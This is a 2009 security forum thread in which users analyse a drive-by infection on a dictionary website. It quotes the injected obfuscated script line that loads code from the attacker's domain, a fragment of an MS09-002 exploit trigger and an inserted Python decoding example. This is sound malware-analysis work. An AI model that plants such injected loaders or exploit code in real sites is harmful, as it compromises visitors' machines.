Author Topic: malicious site  (Read 17588 times)


June 02, 2009, 10:47:13 pm

Shawn Jefferson
Our Symantec Endpoint Protection detected this site today. I had a preliminary look at it and it looks malicious:

http://www.yourdictionary.com/dictionary-articles/german-english-translation.html

It loads scripts from www.rbseu.com (91.121.78.143), which then download, or attempt to download, from many other IPs.

I haven't looked at the files from www.rbseu.com in much depth yet, but they are:

common.js
lastfunc.htm
m1.js
m2.js
subfunc.js (looks like it downloads a SWF file)

The malware may have been removed from the download sites already?

PS. I've downloaded some of the SWF files that subfunc.js downloads, but I'm having trouble decompiling them. I've tried Flare and the HP SWFScan, but neither is working for me. Any suggestions?

June 02, 2009, 11:18:26 pm
Reply #1

MysteryFCM
One of the payloads is at /style.jpg

I'm running the rest of the code through Malzilla to decode it and find the second payload.

Two other scripts it's got:

/s1.js
/s2.js

/edit

VT results for style.jpg

http://www.virustotal.com/analisis/35d1f712765ee7ac8c1af03187823cf6350951be6605b7606894fcf9b6d3682f-1243985377

Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 02, 2009, 11:39:15 pm
Reply #2

Shawn Jefferson
I plugged the m1 and m2 scripts into Malzilla and I think I got the shellcode out... and did an XOR search that found an XOR key of 0xBC.

This URL pops out:

thpt/:w/wwr.sbuec.mot/poj.gp
http://www.rbseu.com/top.jpg

Just verified the MD5s and it's the same file as style.jpg.

June 02, 2009, 11:47:12 pm
Reply #3

MysteryFCM
According to Anubis and VT, top.jpg is the same as style.jpg;

http://anubis.iseclab.org/?action=result&task_id=1fa7eac4cc3407ab4f977479d9c585e86&format=html

/edit

hehe, just noticed your mention of its being the same as style.jpg .....

/edit 2

Sadly, the code I was asking Malzilla to decode ended up crashing it ('twas the mck-wrapped code; definitely some of the shellcode, but I couldn't get it to decode safely, and can't risk this machine). Wepawet couldn't deal with it either.

Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 03, 2009, 06:37:11 pm
Reply #4

Shawn Jefferson
Hi,

Where did you get the s1 and s2 scripts? I didn't see them initially. Edit 2: found these myself!

How is the site infected? I didn't see anything in the source code of the page, and am not sure where else to look exactly! :)

Edit: Found it! So simple, and I overlooked it once already. In the common.js script that loads from the yourdictionary.com site, there is this line:

Code:
document.XXXwrite(String.fromCharCode(60,83,67,82,73,80,84,32,76,65,78,71,85,65,71,69,61,34,74,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,98,115,101,117,46,99,111,109,47,99,111,109,109,111,110,46,106,115,34,62,60,47,115,99,114,105,112,116,62,10));

Malzilla decodes this for me:

Code:
<SCRIPT LANGUAGE="Javascript" src="http://www.rbseu.com/common.js"></script>

Also, I'd like to decompile the SWF file, but had no luck with either Flare or SWFScan. Are there other tools that may be able to do it?

It looks like the m1/m2 scripts are triggering the MS09-002 vulnerability.

Code:
for(var x=0;x<1000;x++)ruix1.push(document.createElement("i"+"mg"));
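A worked example of the two decoding steps in this thread (the String.fromCharCode line from Reply #4, and the single-byte XOR key search plus the swapped-character URL from Reply #2), added here as illustration; it is not code from either poster or from Malzilla. The shellcode bytes are a constructed sample; the only thread values used are the fromCharCode line, the key 0xBC and the decoded URL.

```python
import re

# Constructed sample (not bytes from the thread): filler bytes, then the URL as
# Malzilla showed it in Reply #2 (adjacent characters swapped, as when a 16-bit
# wide string is read back byte by byte), XOR-encoded with the poster's key 0xBC.
XOR_KEY = 0xBC
SAMPLE_SHELLCODE = bytes(
    b ^ XOR_KEY for b in b'\xeb\x10\x5b\x33\xc9thpt/:w/wwr.sbuec.mot/poj.gp\x00'
)

# The document.write line quoted from common.js in Reply #4 ("XXX" defang kept).
COMMON_JS_LINE = (
    'document.XXXwrite(String.fromCharCode(60,83,67,82,73,80,84,32,76,65,78,71,85,65,'
    '71,69,61,34,74,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,104,116,'
    '116,112,58,47,47,119,119,119,46,114,98,115,101,117,46,99,111,109,47,99,111,109,'
    '109,111,110,46,106,115,34,62,60,47,115,99,114,105,112,116,62,10));'
)

def decode_fromcharcode(js):
    """Decode every String.fromCharCode(n,n,...) argument list in js to text."""
    return [''.join(chr(int(n)) for n in args.split(','))
            for args in re.findall(r'String\.fromCharCode\(([\d,]+)\)', js)]

def unswap_pairs(s):
    """Undo the adjacent-character swap (thpt/:w/ww... -> http://www...)."""
    chars = list(s)
    for i in range(0, len(chars) - 1, 2):
        chars[i], chars[i + 1] = chars[i + 1], chars[i]
    return ''.join(chars)

def xor_search(blob, markers=(b'http', b'thpt')):
    """Try every single-byte key; return (key, marker, offset) for each marker hit."""
    hits = []
    for key in range(256):
        plain = bytes(b ^ key for b in blob)
        for marker in markers:
            off = plain.find(marker)
            if off != -1:
                hits.append((key, marker, off))
    return hits

def recover_url(blob):
    """Return (key, url) for the first key that exposes a usable URL, else None."""
    for key, marker, off in xor_search(blob):
        plain = bytes(b ^ key for b in blob)
        run = re.match(rb'[\x21-\x7e]+', plain[off:]).group(0).decode()
        url = unswap_pairs(run) if marker == b'thpt' else run
        if url.startswith('http'):
            return key, url
    return None
```

Searching for the swapped marker as well as the plain one is what lets the search land on strings stored the way the thread's shellcode stored this one.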


June 04, 2009, 08:16:47 am
Reply #5

MysteryFCM
You can use Wepawet to decode the SWF files online. There are a couple of offline tools to do it, but I can't for the life of me remember them atm :(

Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 04, 2009, 03:42:15 pm
Reply #6

Shawn Jefferson
Hi,

I found Wepawet (you had mentioned it earlier) and uploaded a couple of the SWF files. They download menu.jpg, which is an executable, but with a different MD5 than the previous ones.

Thanks!
Shawn

June 04, 2009, 07:46:22 pm
Reply #7

MysteryFCM
No problem :)

Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 05, 2009, 01:20:59 pm
Reply #8

redwolfe_98
"www .rbseu.com" has not yet been added to the "malwaredomainlist".. :)

June 05, 2009, 01:55:38 pm
Reply #9

SysAdMini
Quote from: redwolfe_98
"www .rbseu.com" has not yet been added to the "malwaredomainlist".. :)

I don't see any malicious content at rbseu.com.

All URLs at this domain return

Code:
<h1>Bad Request (Invalid Hostname)</h1>

Ruining the bad guy's day

June 05, 2009, 02:15:05 pm
Reply #10

MysteryFCM
Interesting .... seems it's been taken down .... (unusual for OVH to be so fast)

Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 05, 2009, 02:29:28 pm
Reply #11

redwolfe_98
Quote from: SysAdMini
Quote from: redwolfe_98
"www .rbseu.com" has not yet been added to the "malwaredomainlist".. :)

I don't see any malicious content at rbseu.com.

All URLs at this domain return

Code:
<h1>Bad Request (Invalid Hostname)</h1>

Hey, I put a space between "www" and ".rbseu.com" so that it wouldn't be a "hot" hyperlink. According to "samspade", "www .rbseu.com" is resolving:

http://samspade.org/whois/www.rbseu.com

June 05, 2009, 02:51:26 pm
Reply #12

SysAdMini
Quote from: redwolfe_98
Hey, I put a space between "www" and ".rbseu.com" so that it wouldn't be a "hot" hyperlink. According to "samspade", "www .rbseu.com" is resolving:

http://samspade.org/whois/www.rbseu.com

It's resolving, but there is no content.

Ruining the bad guy's day